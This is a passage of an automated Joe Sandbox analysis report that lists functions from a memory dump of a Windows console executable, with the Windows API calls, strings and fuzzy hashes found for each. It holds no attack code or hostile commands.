Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
String ID: KEYS$LIST$OFF
API String ID: 411561164-4129271751
Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
Instruction ID: 6a96af3a8b9e14b67034338194bcc19aba75b70a5269df98b0a4bb87d3fee05a
Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
Instruction Fuzzy Hash: 93213020A09A03D6FB589F65E44317566A1FF88794F489239CA1EE72E4DF7CEC45C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F801B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F801C4
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F801D6
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F80212
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F80228
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F8023C
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F80251

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
Instruction ID: 04eae5cf1807b772149c35e8ca4478ec5bc5bafab7e4dd1b617da1f2af6f80b6
Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
Instruction Fuzzy Hash: A321AC22A4CA83D7EA544B61A586238AA90FF4A769F5C413DDA0EA76D0CF7CA444C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F83578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F83584
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F8359C
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835C3
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835D9
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835ED
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F83602

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
Instruction ID: 5d4e0456edaf0c4272ea617570ebab0a303301004b3f18384d574e0a00fdf1a0
Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
Instruction Fuzzy Hash: BE118E25A08A43C6EE544B25A546478AAA0FF4A769F0C533ADA2FA33E0DE3CD445C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F89584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F895B4
GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F895C2
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F895CE
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F895DA
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F895EA
QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0 ref: 00007FF683F89605

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
Instruction ID: 1178c2e242b34b42cd1c5f3d21e9c1277f0fe75539ecd018cc84012f8ca3bb83
Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
Instruction Fuzzy Hash: 5C114F26604B41CBEF00DF61E8551A933A4FB0975CF440A39EA6D97B94DF7CD1A4C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F71DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F71E21

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F71F23

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

iswspace.MSVCRT ref: 00007FF683F905B0

Strings

%s, xrefs: 00007FF683F71EF3

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$Heapiswspacememset$AllocProcess
String ID: %s
API String ID: 2401724867-3043279178
Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
Instruction ID: c67b460970da9b81ef371accab7a1b99db1c64384e288021e6c7fbf15a31b2f1
Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
Instruction Fuzzy Hash: 8E51A072A09682C5EB618F21D8126F973A0FF49B94F484139DE5DAB794EF3CE445C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT ref: 00007FF683F7E29D
iswdigit.MSVCRT ref: 00007FF683F7E310

Strings

GeToken: (%x) '%s', xrefs: 00007FF683F8CC39

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswdigit
String ID: GeToken: (%x) '%s'
API String ID: 3849470556-1994581435
Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
Instruction ID: 9c3c27a47cfa0c35c89c2a29557c0d3c6fd63566df9c3081d88f20241c986082
Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
Instruction Fuzzy Hash: B3517821A08692C5EB649F56A4462797BB0FF64B54F08843ADA5DE3390DF7CE881CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F841AD
towupper.MSVCRT ref: 00007FF683F841E1

Strings

:, xrefs: 00007FF683F8ECC3
:, xrefs: 00007FF683F841F2

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CurrentDirectorytowupper
String ID: :$:
API String ID: 238703822-3780739392
Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
Instruction ID: 3fa31a892da4bb0ee3457153e00f3ff4ca2bef95f52c0a16aa51f9a378e197c7
Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
Instruction Fuzzy Hash: DD113452608641C6EB298B22E802279B6E0FF4D799F4D813AED0D97794DF3CD041C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F791C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F7921C

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F793AA

Part of subcall function 00007FF683F78B20: wcsrchr.MSVCRT ref: 00007FF683F78BAB
Part of subcall function 00007FF683F78B20: _wcsicmp.MSVCRT ref: 00007FF683F78BD4
Part of subcall function 00007FF683F78B20: _wcsicmp.MSVCRT ref: 00007FF683F78BF2
Part of subcall function 00007FF683F78B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F78C16
Part of subcall function 00007FF683F78B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F78C2F
Part of subcall function 00007FF683F78B20: wcschr.MSVCRT ref: 00007FF683F78CB3

Part of subcall function 00007FF683F8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F841AD

Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF683F792AC), ref: 00007FF683F830CA
Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE ref: 00007FF683F830DD
Part of subcall function 00007FF683F83060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F830F6
Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE ref: 00007FF683F83106

wcsrchr.MSVCRT ref: 00007FF683F792D8
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F79362
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F79373

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
String ID:
API String ID: 3966000956-0
Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
Instruction ID: e228f4a4f43b89631fdbf81b8061b9de2fd5bc23c143039003724e64921e9c5a
Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
Instruction Fuzzy Hash: A151A132A09682C6EB659F21D8522B973B4FF49B98F084039DA4DA7B94DF3CE551C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F72A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

_setjmp.MSVCRT ref: 00007FF683F72A6A
memset.MSVCRT ref: 00007FF683F72AB4
memset.MSVCRT ref: 00007FF683F72AD8
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F72BED
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F72C0D

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$_setjmp
String ID:
API String ID: 3883041866-0
Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
Instruction ID: 9f3f95746d5fd717c4a33b72af5160cd374b006152ce22598689fe5c2640a024
Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
Instruction Fuzzy Hash: DC515872A08BC6CAEB618F25D8413E977A4FF49748F484139DA4C9BA48DF3CD644CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F9E5AD
memset.MSVCRT ref: 00007FF683F9E5D2

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

_wcsicmp.MSVCRT ref: 00007FF683F9E6A0
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9E6CB
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9E6EB

Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF683F792AC), ref: 00007FF683F830CA
Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE ref: 00007FF683F830DD
Part of subcall function 00007FF683F83060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F830F6
Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE ref: 00007FF683F83106

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ErrorModememset$FullNamePath_wcsicmp
String ID:
API String ID: 2123716050-0
Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
Instruction ID: 6026eebdeb9e79b4d19c5dde34ce37e7e29a090037ba80728e93e611cb5b2ae0
Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
Instruction Fuzzy Hash: 74415E32709BC28AEB758F25D8513E96794FF4978CF084139DA4D9BA99DE3CD244C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F765F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FF683F76627
GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00007FF683F76642

Part of subcall function 00007FF683F85A68: _get_osfhandle.MSVCRT ref: 00007FF683F85A89
Part of subcall function 00007FF683F85A68: SetConsoleMode.KERNELBASE ref: 00007FF683F85A9E
Part of subcall function 00007FF683F85A68: _get_osfhandle.MSVCRT ref: 00007FF683F85AAC

memset.MSVCRT ref: 00007FF683F76697
GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00007FF683F766B0
RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FF683F7670C

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
String ID:
API String ID: 3114114779-0
Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
Instruction ID: 1eff21ee8f741185eca6e2f0ace2d8ffac3508e2a36479e7e6dbd0480884d723
Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
Instruction Fuzzy Hash: 46411836A09B42CAEB00CF65D8412AC37B5FB88748F59413ADE0DA7B54DF38D416C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F88198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

wcscmp.MSVCRT ref: 00007FF683F881EA
wcscmp.MSVCRT ref: 00007FF683F881FD

Strings

????????.???, xrefs: 00007FF683F881F3
*.*, xrefs: 00007FF683F881E0

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcscmp
String ID: *.*$????????.???
API String ID: 3392835482-3870530610
Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
Instruction ID: ef7475bb1b0ea7f183deecbbcca64c57fd1d86cad5ef25c18d37aea0f0346e36
Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
Instruction Fuzzy Hash: DC115A25B64A62C1EA688B27E44252962A1FF44B80B1D5039DE8DA7B89DE3DE481C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F809F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

iswspace.MSVCRT ref: 00007FF683F80A11
wcschr.MSVCRT ref: 00007FF683F80A2B

Strings

=,;, xrefs: 00007FF683F80A24
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF683F809FE

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswspacewcschr
String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
API String ID: 287713880-1183017076
Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
Instruction ID: 39fa8ca49812355d70bb1fbdf54fef19b06481b443bea48f91165844777ad5ee
Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
Instruction Fuzzy Hash: 3DF04421A58653E1EA688B42E8421B66590FF45F40BCE9139D95EA3354DF2CE444C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F76A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON

